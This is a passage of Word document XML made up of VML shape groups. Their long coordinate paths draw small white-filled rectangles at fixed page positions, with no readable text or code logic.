12210,3404,12210,3403,12210,3403,12210,3402,12210,3401,12210,3400,12210,3400,12210,3399,12210,3398,12210,3397,12210,3396,12210,3395,12210,3394,12210,3393,12210,3392,12210,3391,12210,3390,12210,3389,12210,3388,12210,3387,12210,3386,12210,3384,12210,3383,12210,3382,12210,3381,12210,3379,12210,3378,12210,3376,12210,3375,12210,3373,12210,3372,12210,3370,12210,3369,12210,3367,12210,3365,12210,3364,12210,3362,12210,3360,12210,3358,12210,3357,12210,3355,12210,3353,12210,3351,12210,3349,12210,3347,12210,3344,12210,3342,12210,3340,12210,3338,12210,3336,12210,3333,12210,3331,12210,3328,12210,3326,12210,3323,12210,3321,12210,3318,12210,3316,12210,3313,12210,3310,12210,3307,12210,3305,12210,3302,12210,3299,12210,3296,12210,3296,12210,3296,12210,3296,12210,3296,12210,3296,12210,3296,12210,3296,12210,3296,12210,3296,12210,3296,12210,3296,12210,3296,12210,3296,12210,3296,12210,3296,12210,3296,12210,3296,12210,3296,12209,3296,12209,3296,12209,3296,12209,3296,12209,3296,12209,3296,12208,3296,12208,3296,12208,3296,12207,3296,12207,3296,12207,3296,12206,3296,12206,3296,12206,3296,12205,3296,12205,3296,12204,3296,12204,3296,12203,3296,12202,3296,12202,3296,12201,3296,12200,3296,12200,3296,12199,3296,12198,3296,12197,3296,12196,3296,12195,3296,12194,3296,12193,3296,12192,3296,12191,3296,12190,3296,12189,3296,12188,3296,12186,3296,12185,3296,12184,3296,12182,3296,12181,3296,12179,3296,12177,3296,12176,3296,12174,3296,12172,3296,12170,3296,12169,3296,12167,3296,12165,3296,12163,3296,12160,3296,12158,3296,12156,3296,12154,3296,12151,3296,12149,3296,12146,3296,12144,3296,12141,3296,12138,3296,12136,3296,12133,3296,12130,3296,12127,3296,12124,3296,12120,3296,12117,3296,12114,3296,12110,3296,12107,3296,12103,3296,12100,3296,12096,3296,12092,3296,12088,3296,12084,3296,12080,3296,12076,3296,12072,3296,12068,3296,12063,3296,12059,3296,12054,3296,12049,3296,12045,3296,12040,3296,12035,3296,12030,3296,12025,3296,12019,3296,12014,3296,12009,3296,12003,3296,11997,3296,11992,3296,11986,3296,11980,3296,11974,3296,11968,3296,11961,3296,11955e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:336.500pt;margin-top:615.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="6730,12310" coordsize="130,270">
        <v:shape style="position:absolute;left:6730;top:12310;width:130;height:270" coordorigin="6730,12310" coordsize="130,270" path="m6747,12330l6747,12330,6747,12330,6747,12330,6747,12330,6747,12330,6747,12330,6747,12330,6747,12330,6747,12330,6747,12330,6747,12330,6747,12330,6748,12330,6748,12330,6748,12330,6748,12330,6748,12330,6748,12330,6748,12330,6748,12330,6748,12330,6748,12330,6748,12330,6748,12330,6748,12330,6749,12330,6749,12330,6749,12330,6749,12330,6749,12330,6749,12330,6750,12330,6750,12330,6750,12330,6750,12330,6750,12330,6751,12330,6751,12330,6751,12330,6752,12330,6752,12330,6752,12330,6753,12330,6753,12330,6753,12330,6754,12330,6754,12330,6755,12330,6755,12330,6756,12330,6756,12330,6757,12330,6757,12330,6758,12330,6759,12330,6759,12330,6760,12330,6761,12330,6761,12330,6762,12330,6763,12330,6764,12330,6764,12330,6765,12330,6766,12330,6767,12330,6768,12330,6769,12330,6770,12330,6771,12330,6772,12330,6773,12330,6774,12330,6775,12330,6776,12330,6777,12330,6779,12330,6780,12330,6781,12330,6783,12330,6784,12330,6785,12330,6787,12330,6788,12330,6790,12330,6791,12330,6793,12330,6794,12330,6796,12330,6798,12330,6799,12330,6801,12330,6803,12330,6805,12330,6807,12330,6808,12330,6810,12330,6812,12330,6814,12330,6817,12330,6819,12330,6821,12330,6823,12330,6825,12330,6828,12330,6830,12330,6832,12330,6835,12330,6837,12330,6840,12330,6842,12330,6845,12330,6847,12330,6850,12330,6853,12330,6856,12330,6859,12330,6862,12330,6864,12330,6867,12330,6867,12330,6867,12330,6867,12330,6867,12330,6867,12330,6867,12330,6867,12330,6867,12330,6867,12330,6867,12330,6867,12330,6867,12330,6867,12330,6867,12331,6867,12331,6867,12331,6867,12331,6867,12331,6867,12331,6867,12331,6867,12331,6867,12332,6867,12332,6867,12332,6867,12332,6867,12333,6867,12333,6867,12333,6867,12334,6867,12334,6867,12334,6867,12335,6867,12335,6867,12336,6867,12336,6867,12337,6867,12337,6867,12338,6867,12339,6867,12339,6867,12340,6867,12341,6867,12341,6867,12342,6867,12343,6867,12344,6867,12345,6867,12346,6867,12347,6867,12348,6867,12349,6867,12350,6867,12352,6867,12353,6867,12354,6867,12355,6867,12357,6867,12358,6867,12360,6867,12361,6867,12363,6867,12365,6867,12366,6867,12368,6867,12370,6867,12372,6867,12374,6867,12376,6867,12378,6867,12380,6867,12382,6867,12384,6867,12387,6867,12389,6867,12392,6867,12394,6867,12397,6867,12399,6867,12402,6867,12405,6867,12408,6867,12411,6867,12414,6867,12417,6867,12420,6867,12423,6867,12427,6867,12430,6867,12433,6867,12437,6867,12441,6867,12444,6867,12448,6867,12452,6867,12456,6867,12460,6867,12464,6867,12468,6867,12473,6867,12477,6867,12482,6867,12486,6867,12491,6867,12496,6867,12501,6867,12505,6867,12511,6867,12516,6867,12521,6867,12526,6867,12532,6867,12537,6867,12543,6867,12549,6867,12555,6867,12560,6867,12567,6867,12573,6867,12579,6867,12585,6867,12585,6867,12585,6867,12585,6867,12585,6867,12585,6867,12585,6867,12585,6867,12585,6867,12585,6867,12585,6867,12585,6867,12585,6867,12585,6867,12585,6867,12585,6867,12585,6867,12585,6867,12585,6867,12585,6867,12585,6867,12585,6867,12585,6867,12585,6867,12585,6866,12585,6866,12585,6866,12585,6866,12585,6866,12585,6866,12585,6866,12585,6865,12585,6865,12585,6865,12585,6865,12585,6864,12585,6864,12585,6864,12585,6864,12585,6863,12585,6863,12585,6863,12585,6862,12585,6862,12585,6861,12585,6861,12585,6861,12585,6860,12585,6860,12585,6859,12585,6859,12585,6858,12585,6857,12585,6857,12585,6856,12585,6856,12585,6855,12585,6854,12585,6854,12585,6853,12585,6852,12585,6851,12585,6850,12585,6850,12585,6849,12585,6848,12585,6847,12585,6846,12585,6845,12585,6844,12585,6843,12585,6842,12585,6841,12585,6840,12585,6839,12585,6837,12585,6836,12585,6835,12585,6834,12585,6832,12585,6831,12585,6830,12585,6828,12585,6827,12585,6825,12585,6824,12585,6822,12585,6821,12585,6819,12585,6817,12585,6816,12585,6814,12585,6812,12585,6810,12585,6808,12585,6806,12585,6804,12585,6802,12585,6800,12585,6798,12585,6796,12585,6794,12585,6792,12585,6790,12585,6787,12585,6785,12585,6783,12585,6780,12585,6778,12585,6775,12585,6773,12585,6770,12585,6767,12585,6765,12585,6762,12585,6759,12585,6756,12585,6753,12585,6750,12585,6747,12585,6747,12585,6747,12585,6747,12585,6747,12585,6747,12585,6747,12585,6747,12585,6747,12585,6747,12585,6747,12585,6747,12585,6747,12585,6747,12585,6747,12585,6747,12585,6747,12585,6747,12585,6747,12585,6747,12584,6747,12584,6747,12584,6747,12584,6747,12584,6747,12584,6747,12583,6747,12583,6747,12583,6747,12582,6747,12582,6747,12582,6747,12581,6747,12581,6747,12580,6747,12580,6747,12579,6747,12579,6747,12578,6747,12578,6747,12577,6747,12576,6747,12576,6747,12575,6747,12574,6747,12573,6747,12572,6747,12572,6747,12571,6747,12570,6747,12569,6747,12568,6747,12566,6747,12565,6747,12564,6747,12563,6747,12562,6747,12560,6747,12559,6747,12557,6747,12556,6747,12554,6747,12553,6747,12551,6747,12549,6747,12547,6747,12546,6747,12544,6747,12542,6747,12540,6747,12538,6747,12536,6747,12533,6747,12531,6747,12529,6747,12526,6747,12524,6747,12521,6747,12519,6747,12516,6747,12513,6747,12511,6747,12508,6747,12505,6747,12502,6747,12499,6747,12496,6747,12492,6747,12489,6747,12486,6747,12482,6747,12479,6747,12475,6747,12471,6747,12467,6747,12464,6747,12460,6747,12456,6747,12451,6747,12447,6747,12443,6747,12438,6747,12434,6747,12429,6747,12425,6747,12420,6747,12415,6747,12410,6747,12405,6747,12400,6747,12395,6747,12389,6747,12384,6747,12378,6747,12373,6747,12367,6747,12361,6747,12355,6747,12349,6747,12343,6747,12337,6747,12330e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:162.500pt;margin-top:647.500pt;width:6.500pt;height:12.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="3250,12950" coordsize="130,250">
        <v:shape style="position:absolute;left:3250;top:12950;width:130;height:250" coordorigin="3250,12950" coordsize="130,250" path="m3266,12961l3266,12961,3266,12961,3266,12961,3266,12961,3266,12961,3266,12961,3266,12961,3266,12961,3266,12961,3266,12961,3266,12961,3266,12961,3266,12961,3266,12961,3266,12961,3266,12961,3266,12961,3266,12961,3266,12961,3266,12961,3266,12961,3266,12961,3266,12961,3267,12961,3267,12961,3267,12961,3267,12961,3267,12961,3267,12961,3267,12961,3268,12961,3268,12961,3268,12961,3268,12961,3268,12961,3269,12961,3269,12961,3269,12961,3270,12961,3270,12961,3270,12961,3271,12961,3271,12961,3271,12961,3272,12961,3272,12961,3273,12961,3273,12961,3274,12961,3274,12961,3275,12961,3275,12961,3276,12961,3276,12961,3277,12961,3277,12961,3278,12961,3279,12961,3280,12961,3280,12961,3281,12961,3282,12961,3283,12961,3283,12961,3284,12961,3285,12961,3286,12961,3287,12961,3288,12961,3289,12961,3290,12961,3291,12961,3292,12961,3293,12961,3295,12961,3296,12961,3297,12961,3298,12961,3299,12961,3301,12961,3302,12961,3304,12961,3305,12961,3306,12961,3308,12961,3309,12961,3311,12961,3313,12961,3314,12961,3316,12961,3318,12961,3319,12961,3321,12961,3323,12961,3325,12961,3327,12961,3329,12961,3331,12961,3333,12961,3335,12961,3337,12961,3339,12961,3341,12961,3343,12961,3346,12961,3348,12961,3350,12961,3353,12961,3355,12961,3358,12961,3360,12961,3363,12961,3366,12961,3368,12961,3371,12961,3374,12961,3377,12961,3380,12961,3383,12961,3386,12961,3386,12961,3386,12961,3386,12961,3386,12961,3386,12961,3386,12961,3386,12961,3386,12961,3386,12961,3386,12961,3386,12961,3386,12961,3386,12961,3386,12961,3386,12961,3386,12961,3386,12961,3386,12961,3386,12961,3386,12962,3386,12962,3386,12962,3386,12962,3386,12962,3386,12963,3386,12963,3386,12963,3386,12964,3386,12964,3386,12964,3386,12965,3386,12965,3386,12965,3386,12966,3386,12966,3386,12967,3386,12968,3386,12968,3386,12969,3386,12970,3386,12970,3386,12971,3386,12972,3386,12973,3386,12973,3386,12974,3386,12975,3386,12976,3386,12977,3386,12978,3386,12979,3386,12981,3386,12982,3386,12983,3386,12984,3386,12986,3386,12987,3386,12989,3386,12990,3386,12992,3386,12993,3386,12995,3386,12997,3386,12998,3386,13000,3386,13002,3386,13004,3386,13006,3386,13008,3386,13010,3386,13012,3386,13015,3386,13017,3386,13019,3386,13022,3386,13024,3386,13027,3386,13030,3386,13032,3386,13035,3386,13038,3386,13041,3386,13044,3386,13047,3386,13050,3386,13054,3386,13057,3386,13060,3386,13064,3386,13067,3386,13071,3386,13075,3386,13078,3386,13082,3386,13086,3386,13090,3386,13094,3386,13099,3386,13103,3386,13107,3386,13112,3386,13117,3386,13121,3386,13126,3386,13131,3386,13136,3386,13141,3386,13146,3386,13151,3386,13157,3386,13162,3386,13168,3386,13173,3386,13179,3386,13185,3386,13191,3386,13197,3386,13203,3386,13209,3386,13216,3386,13216,3386,13216,3386,13216,3386,13216,3386,13216,3386,13216,3386,13216,3386,13216,3386,13216,3386,13216,3386,13216,3386,13216,3386,13216,3386,13216,3386,13216,3385,13216,3385,13216,3385,13216,3385,13216,3385,13216,3385,13216,3385,13216,3385,13216,3385,13216,3385,13216,3385,13216,3384,13216,3384,13216,3384,13216,3384,13216,3384,13216,3384,13216,3383,13216,3383,13216,3383,13216,3383,13216,3382,13216,3382,13216,3382,13216,3381,13216,3381,13216,3381,13216,3380,13216,3380,13216,3380,13216,3379,13216,3379,13216,3378,13216,3378,13216,3377,13216,3377,13216,3376,13216,3376,13216,3375,13216,3374,13216,3374,13216,3373,13216,3373,13216,3372,13216,3371,13216,3370,13216,3370,13216,3369,13216,3368,13216,3367,13216,3366,13216,3365,13216,3364,13216,3363,13216,3362,13216,3361,13216,3360,13216,3359,13216,3358,13216,3357,13216,3356,13216,3354,13216,3353,13216,3352,13216,3351,13216,3349,13216,3348,13216,3346,13216,3345,13216,3343,13216,3342,13216,3340,13216,3339,13216,3337,13216,3335,13216,3334,13216,3332,13216,3330,13216,3328,13216,3327,13216,3325,13216,3323,13216,3321,13216,3319,13216,3317,13216,3314,13216,3312,13216,3310,13216,3308,13216,3306,13216,3303,13216,3301,13216,3298,13216,3296,13216,3293,13216,3291,13216,3288,13216,3286,13216,3283,13216,3280,13216,3277,13216,3274,13216,3272,13216,3269,13216,3266,13216,3266,13216,3266,13216,3266,13216,3266,13216,3266,13216,3266,13216,3266,13216,3266,13216,3266,13216,3266,13216,3266,13216,3266,13215,3266,13215,3266,13215,3266,13215,3266,13215,3266,13215,3266,13215,3266,13215,3266,13215,3266,13214,3266,13214,3266,13214,3266,13214,3266,13214,3266,13213,3266,13213,3266,13213,3266,13212,3266,13212,3266,13212,3266,13211,3266,13211,3266,13210,3266,13210,3266,13209,3266,13209,3266,13208,3266,13207,3266,13207,3266,13206,3266,13205,3266,13204,3266,13204,3266,13203,3266,13202,3266,13201,3266,13200,3266,13199,3266,13198,3266,13197,3266,13196,3266,13194,3266,13193,3266,13192,3266,13190,3266,13189,3266,13188,3266,13186,3266,13185,3266,13183,3266,13181,3266,13180,3266,13178,3266,13176,3266,13174,3266,13172,3266,13170,3266,13168,3266,13166,3266,13164,3266,13161,3266,13159,3266,13157,3266,13154,3266,13152,3266,13149,3266,13147,3266,13144,3266,13141,3266,13138,3266,13135,3266,13132,3266,13129,3266,13126,3266,13123,3266,13119,3266,13116,3266,13112,3266,13109,3266,13105,3266,13102,3266,13098,3266,13094,3266,13090,3266,13086,3266,13082,3266,13077,3266,13073,3266,13069,3266,13064,3266,13060,3266,13055,3266,13050,3266,13045,3266,13040,3266,13035,3266,13030,3266,13025,3266,13020,3266,13014,3266,13009,3266,13003,3266,12997,3266,12991,3266,12985,3266,12979,3266,12973,3266,12967,3266,12961e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:168.500pt;margin-top:647.500pt;width:6.500pt;height:12.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="3370,12950" coordsize="130,250">
        <v:shape style="position:absolute;left:3370;top:12950;width:130;height:250" coordorigin="3370,12950" coordsize="130,250" path="m3386,12961l3386,12961,3386,12961,3386,12961,3386,12961,3386,12961,3386,12961,3386,12961,3386,12961,3386,12961,3386,12961,3386,12961,3386,12961,3386,12961,3386,12961,3386,12961,3386,12961,3386,12961,3386,12961,3386,12961,3386,12961,3386,12961,3386,12961,3386,12961,3387,12961,3387,12961,3387,12961,3387,12961,3387,12961,3387,12961,3387,12961,3388,12961,3388,12961,3388,12961,3388,12961,3389,12961,3389,12961,3389,12961,3389,12961,3390,12961,3390,12961,3390,12961,3391,12961,3391,12961,3391,12961,3392,12961,3392,12961,3393,12961,3393,12961,3394,12961,3394,12961,3395,12961,3395,12961,3396,12961,3396,12961,3397,12961,3398,12961,3398,12961,3399,12961,3400,12961,3400,12961,3401,12961,3402,12961,3403,12961,3404,12961,3404,12961,3405,12961,3406,12961,3407,12961,3408,12961,3409,12961,3410,12961,3411,12961,3412,12961,3413,12961,3415,12961,3416,12961,3417,12961,3418,12961,3420,12961,3421,12961,3422,12961,3424,12961,3425,12961,3426,12961,3428,12961,3429,12961,3431,12961,3433,12961,3434,12961,3436,12961,3438,12961,3439,12961,3441,12961,3443,12961,3445,12961,3447,12961,3449,12961,3451,12961,3453,12961,3455,12961,3457,12961,3459,12961,3461,12961,3464,12961,3466,12961,3468,12961,3471,12961,3473,12961,3475,12961,3478,12961,3481,12961,3483,12961,3486,12961,3489,12961,3491,12961,3494,12961,3497,12961,3500,12961,3503,12961,3506,12961,3506,12961,3506,12961,3506,12961,3506,12961,3506,12961,3506,12961,3506,12961,3506,12961,3506,12961,3506,12961,3506,12961,3506,12961,3506,12961,3506,12961,3506,12961,3506,12961,3506,12961,3506,12961,3506,12961,3506,12962,3506,12962,3506,12962,3506,12962,3506,12962,3506,12963,3506,12963,3506,12963,3506,12964,3506,12964,3506,12964,3506,12965,3506,12965,3506,12965,3506,12966,3506,12966,3506,12967,3506,12968,3506,12968,3506,12969,3506,12970,3506,12970,3506,12971,3506,12972,3506,12973,3506,12973,3506,12974,3506,12975,3506,12976,3506,12977,3506,12978,3506,12979,3506,12981,3506,12982,3506,12983,3506,12984,3506,12986,3506,12987,3506,12989,3506,12990,3506,12992,3506,12993,3506,12995,3506,12997,3506,12998,3506,13000,3506,13002,3506,13004,3506,13006,3506,13008,3506,13010,3506,13012,3506,13015,3506,13017,3506,13019,3506,13022,3506,13024,3506,13027,3506,13030,3506,13032,3506,13035,3506,13038,3506,13041,3506,13044,3506,13047,3506,13050,3506,13054,3506,13057,3506,13060,3506,13064,3506,13067,3506,13071,3506,13075,3506,13078,3506,13082,3506,13086,3506,13090,3506,13094,3506,13099,3506,13103,3506,13107,3506,13112,3506,13117,3506,13121,3506,13126,3506,13131,3506,13136,3506,13141,3506,13146,3506,13151,3506,13157,3506,13162,3506,13168,3506,13173,3506,13179,3506,13185,3506,13191,3506,13197,3506,13203,3506,13209,3506,13216,3506,13216,3506,13216,3506,13216,3506,13216,3506,13216,3506,13216,3506,13216,3506,13216,3506,13216,3506,13216,3506,13216,3506,13216,3506,13216,3506,13216,3506,13216,3506,13216,3505,13216,3505,13216,3505,13216,3505,13216,3505,13216,3505,13216,3505,13216,3505,13216,3505,13216,3505,13216,3505,13216,3504,13216,3504,13216,3504,13216,3504,13216,3504,13216,3503,13216,3503,13216,3503,13216,3503,13216,3502,13216,3502,13216,3502,13216,3502,13216,3501,13216,3501,13216,3500,13216,3500,13216,3500,13216,3499,13216,3499,13216,3498,13216,3498,13216,3497,13216,3497,13216,3496,13216,3496,13216,3495,13216,3495,13216,3494,13216,3493,13216,3493,13216,3492,13216,3491,13216,3490,13216,3490,13216,3489,13216,3488,13216,3487,13216,3486,13216,3485,13216,3484,13216,3483,13216,3482,13216,3481,13216,3480,13216,3479,13216,3478,13216,3477,13216,3476,13216,3474,13216,3473,13216,3472,13216,3471,13216,3469,13216,3468,13216,3466,13216,3465,13216,3464,13216,3462,13216,3460,13216,3459,13216,3457,13216,3456,13216,3454,13216,3452,13216,3450,13216,3448,13216,3447,13216,3445,13216,3443,13216,3441,13216,3439,13216,3437,13216,3435,13216,3432,13216,3430,13216,3428,13216,3426,13216,3423,13216,3421,13216,3418,13216,3416,13216,3413,13216,3411,13216,3408,13216,3406,13216,3403,13216,3400,13216,3397,13216,3395,13216,3392,13216,3389,13216,3386,13216,3386,13216,3386,13216,3386,13216,3386,13216,3386,13216,3386,13216,3386,13216,3386,13216,3386,13216,3386,13216,3386,13216,3386,13215,3386,13215,3386,13215,3386,13215,3386,13215,3386,13215,3386,13215,3386,13215,3386,13215,3386,13214,3386,13214,3386,13214,3386,13214,3386,13214,3386,13213,3386,13213,3386,13213,3386,13212,3386,13212,3386,13212,3386,13211,3386,13211,3386,13210,3386,13210,3386,13209,3386,13209,3386,13208,3386,13207,3386,13207,3386,13206,3386,13205,3386,13204,3386,13204,3386,13203,3386,13202,3386,13201,3386,13200,3386,13199,3386,13198,3386,13197,3386,13196,3386,13194,3386,13193,3386,13192,3386,13190,3386,13189,3386,13188,3386,13186,3386,13185,3386,13183,3386,13181,3386,13180,3386,13178,3386,13176,3386,13174,3386,13172,3386,13170,3386,13168,3386,13166,3386,13164,3386,13161,3386,13159,3386,13157,3386,13154,3386,13152,3386,13149,3386,13147,3386,13144,3386,13141,3386,13138,3386,13135,3386,13132,3386,13129,3386,13126,3386,13123,3386,13119,3386,13116,3386,13112,3386,13109,3386,13105,3386,13102,3386,13098,3386,13094,3386,13090,3386,13086,3386,13082,3386,13077,3386,13073,3386,13069,3386,13064,3386,13060,3386,13055,3386,13050,3386,13045,3386,13040,3386,13035,3386,13030,3386,13025,3386,13020,3386,13014,3386,13009,3386,13003,3386,12997,3386,12991,3386,12985,3386,12979,3386,12973,3386,12967,3386,12961e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:132.500pt;margin-top:665.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2650,13310" coordsize="130,270">
        <v:shape style="position:absolute;left:2650;top:13310;width:130;height:270" coordorigin="2650,13310" coordsize="130,270" path="m2665,13336l2665,13336,2665,13336,2665,13336,2665,13336,2665,13336,2665,13336,2665,13336,2665,13336,2665,13336,2665,13336,2665,13336,2665,13336,2665,13336,2665,13336,2666,13336,2666,13336,2666,13336,2666,13336,2666,13336,2666,13336,2666,13336,2666,13336,2666,13336,2666,13336,2666,13336,2666,13336,2667,13336,2667,13336,2667,13336,2667,13336,2667,13336,2667,13336,2668,13336,2668,13336,2668,13336,2668,13336,2669,13336,2669,13336,2669,13336,2670,13336,2670,13336,2670,13336,2671,13336,2671,13336,2671,13336,2672,13336,2672,13336,2673,13336,2673,13336,2674,13336,2674,13336,2675,13336,2675,13336,2676,13336,2677,13336,2677,13336,2678,13336,2679,13336,2679,13336,2680,13336,2681,13336,2682,13336,2682,13336,2683,13336,2684,13336,2685,13336,2686,13336,2687,13336,2688,13336,2689,13336,2690,13336,2691,13336,2692,13336,2693,13336,2694,13336,2695,13336,2697,13336,2698,13336,2699,13336,2700,13336,2702,13336,2703,13336,2705,13336,2706,13336,2708,13336,2709,13336,2711,13336,2712,13336,2714,13336,2716,13336,2717,13336,2719,13336,2721,13336,2723,13336,2725,13336,2726,13336,2728,13336,2730,13336,2732,13336,2734,13336,2737,13336,2739,13336,2741,13336,2743,13336,2745,13336,2748,13336,2750,13336,2753,13336,2755,13336,2758,13336,2760,13336,2763,13336,2765,13336,2768,13336,2771,13336,2774,13336,2777,13336,2779,13336,2782,13336,2785,13336,2785,13336,2785,13336,2785,13336,2785,13336,2785,13336,2785,13336,2785,13336,2785,13336,2785,13336,2785,13336,2785,13336,2785,13336,2785,13336,2785,13336,2785,13336,2785,13336,2785,13336,2785,13336,2785,13337,2785,13337,2785,13337,2785,13337,2785,13337,2785,13338,2785,13338,2785,13338,2785,13338,2785,13339,2785,13339,2785,13339,2785,13340,2785,13340,2785,13341,2785,13341,2785,13342,2785,13342,2785,13343,2785,13343,2785,13344,2785,13345,2785,13345,2785,13346,2785,13347,2785,13348,2785,13349,2785,13350,2785,13350,2785,13351,2785,13352,2785,13354,2785,13355,2785,13356,2785,13357,2785,13358,2785,13360,2785,13361,2785,13362,2785,13364,2785,13365,2785,13367,2785,13368,2785,13370,2785,13372,2785,13374,2785,13375,2785,13377,2785,13379,2785,13381,2785,13383,2785,13385,2785,13388,2785,13390,2785,13392,2785,13395,2785,13397,2785,13400,2785,13402,2785,13405,2785,13408,2785,13410,2785,13413,2785,13416,2785,13419,2785,13422,2785,13425,2785,13429,2785,13432,2785,13435,2785,13439,2785,13442,2785,13446,2785,13450,2785,13454,2785,13457,2785,13461,2785,13466,2785,13470,2785,13474,2785,13478,2785,13483,2785,13487,2785,13492,2785,13496,2785,13501,2785,13506,2785,13511,2785,13516,2785,13521,2785,13526,2785,13532,2785,13537,2785,13543,2785,13548,2785,13554,2785,13560,2785,13566,2785,13572,2785,13578,2785,13584,2785,13591,2785,13591,2785,13591,2785,13591,2785,13591,2785,13591,2785,13591,2785,13591,2785,13591,2785,13591,2785,13591,2785,13591,2785,13591,2785,13591,2785,13591,2785,13591,2785,13591,2785,13591,2785,13591,2785,13591,2785,13591,2785,13591,2785,13591,2785,13591,2785,13591,2784,13591,2784,13591,2784,13591,2784,13591,2784,13591,2784,13591,2783,13591,2783,13591,2783,13591,2783,13591,2783,13591,2782,13591,2782,13591,2782,13591,2781,13591,2781,13591,2781,13591,2780,13591,2780,13591,2780,13591,2779,13591,2779,13591,2778,13591,2778,13591,2778,13591,2777,13591,2776,13591,2776,13591,2775,13591,2775,13591,2774,13591,2774,13591,2773,13591,2772,13591,2772,13591,2771,13591,2770,13591,2769,13591,2768,13591,2768,13591,2767,13591,2766,13591,2765,13591,2764,13591,2763,13591,2762,13591,2761,13591,2760,13591,2759,13591,2758,13591,2757,13591,2755,13591,2754,13591,2753,13591,2752,13591,2750,13591,2749,13591,2748,13591,2746,13591,2745,13591,2743,13591,2742,13591,2740,13591,2738,13591,2737,13591,2735,13591,2733,13591,2732,13591,2730,13591,2728,13591,2726,13591,2724,13591,2722,13591,2720,13591,2718,13591,2716,13591,2714,13591,2712,13591,2710,13591,2708,13591,2705,13591,2703,13591,2701,13591,2698,13591,2696,13591,2693,13591,2691,13591,2688,13591,2685,13591,2683,13591,2680,13591,2677,13591,2674,13591,2671,13591,2668,13591,2665,13591,2665,13591,2665,13591,2665,13591,2665,13591,2665,13591,2665,13591,2665,13591,2665,13591,2665,13591,2665,13591,2665,13591,2665,13591,2665,13591,2665,13591,2665,13590,2665,13590,2665,13590,2665,13590,2665,13590,2665,13590,2665,13590,2665,13589,2665,13589,2665,13589,2665,13589,2665,13588,2665,13588,2665,13588,2665,13588,2665,13587,2665,13587,2665,13586,2665,13586,2665,13585,2665,13585,2665,13584,2665,13584,2665,13583,2665,13583,2665,13582,2665,13581,2665,13580,2665,13580,2665,13579,2665,13578,2665,13577,2665,13576,2665,13575,2665,13574,2665,13573,2665,13572,2665,13571,2665,13570,2665,13568,2665,13567,2665,13566,2665,13564,2665,13563,2665,13561,2665,13560,2665,13558,2665,13556,2665,13555,2665,13553,2665,13551,2665,13549,2665,13547,2665,13545,2665,13543,2665,13541,2665,13539,2665,13537,2665,13534,2665,13532,2665,13529,2665,13527,2665,13524,2665,13522,2665,13519,2665,13516,2665,13513,2665,13510,2665,13507,2665,13504,2665,13501,2665,13498,2665,13495,2665,13491,2665,13488,2665,13484,2665,13480,2665,13477,2665,13473,2665,13469,2665,13465,2665,13461,2665,13457,2665,13453,2665,13448,2665,13444,2665,13439,2665,13435,2665,13430,2665,13425,2665,13421,2665,13416,2665,13411,2665,13405,2665,13400,2665,13395,2665,13389,2665,13384,2665,13378,2665,13372,2665,13367,2665,13361,2665,13355,2665,13348,2665,13342,2665,13336e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:150.500pt;margin-top:665.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="3010,13310" coordsize="130,270">
        <v:shape style="position:absolute;left:3010;top:13310;width:130;height:270" coordorigin="3010,13310" coordsize="130,270" path="m3026,13336l3026,13336,3026,13336,3026,13336,3026,13336,3026,13336,3026,13336,3026,13336,3026,13336,3026,13336,3026,13336,3026,13336,3026,13336,3026,13336,3026,13336,3026,13336,3026,13336,3026,13336,3026,13336,3026,13336,3026,13336,3026,13336,3026,13336,3026,13336,3026,13336,3027,13336,3027,13336,3027,13336,3027,13336,3027,13336,3027,13336,3027,13336,3028,13336,3028,13336,3028,13336,3028,13336,3029,13336,3029,13336,3029,13336,3029,13336,3030,13336,3030,13336,3030,13336,3031,13336,3031,13336,3032,13336,3032,13336,3032,13336,3033,13336,3033,13336,3034,13336,3034,13336,3035,13336,3036,13336,3036,13336,3037,13336,3037,13336,3038,13336,3039,13336,3039,13336,3040,13336,3041,13336,3042,13336,3043,13336,3043,13336,3044,13336,3045,13336,3046,13336,3047,13336,3048,13336,3049,13336,3050,13336,3051,13336,3052,13336,3053,13336,3054,13336,3056,13336,3057,13336,3058,13336,3059,13336,3061,13336,3062,13336,3063,13336,3065,13336,3066,13336,3068,13336,3069,13336,3071,13336,3072,13336,3074,13336,3076,13336,3077,13336,3079,13336,3081,13336,3083,13336,3085,13336,3087,13336,3089,13336,3091,13336,3093,13336,3095,13336,3097,13336,3099,13336,3101,13336,3103,13336,3106,13336,3108,13336,3110,13336,3113,13336,3115,13336,3118,13336,3120,13336,3123,13336,3126,13336,3128,13336,3131,13336,3134,13336,3137,13336,3140,13336,3143,13336,3146,13336,3146,13336,3146,13336,3146,13336,3146,13336,3146,13336,3146,13336,3146,13336,3146,13336,3146,13336,3146,13336,3146,13336,3146,13336,3146,13336,3146,13336,3146,13336,3146,13336,3146,13336,3146,13336,3146,13337,3146,13337,3146,13337,3146,13337,3146,13337,3146,13338,3146,13338,3146,13338,3146,13338,3146,13339,3146,13339,3146,13339,3146,13340,3146,13340,3146,13341,3146,13341,3146,13342,3146,13342,3146,13343,3146,13343,3146,13344,3146,13345,3146,13345,3146,13346,3146,13347,3146,13348,3146,13349,3146,13350,3146,13350,3146,13351,3146,13352,3146,13354,3146,13355,3146,13356,3146,13357,3146,13358,3146,13360,3146,13361,3146,13362,3146,13364,3146,13365,3146,13367,3146,13368,3146,13370,3146,13372,3146,13374,3146,13375,3146,13377,3146,13379,3146,13381,3146,13383,3146,13385,3146,13388,3146,13390,3146,13392,3146,13395,3146,13397,3146,13400,3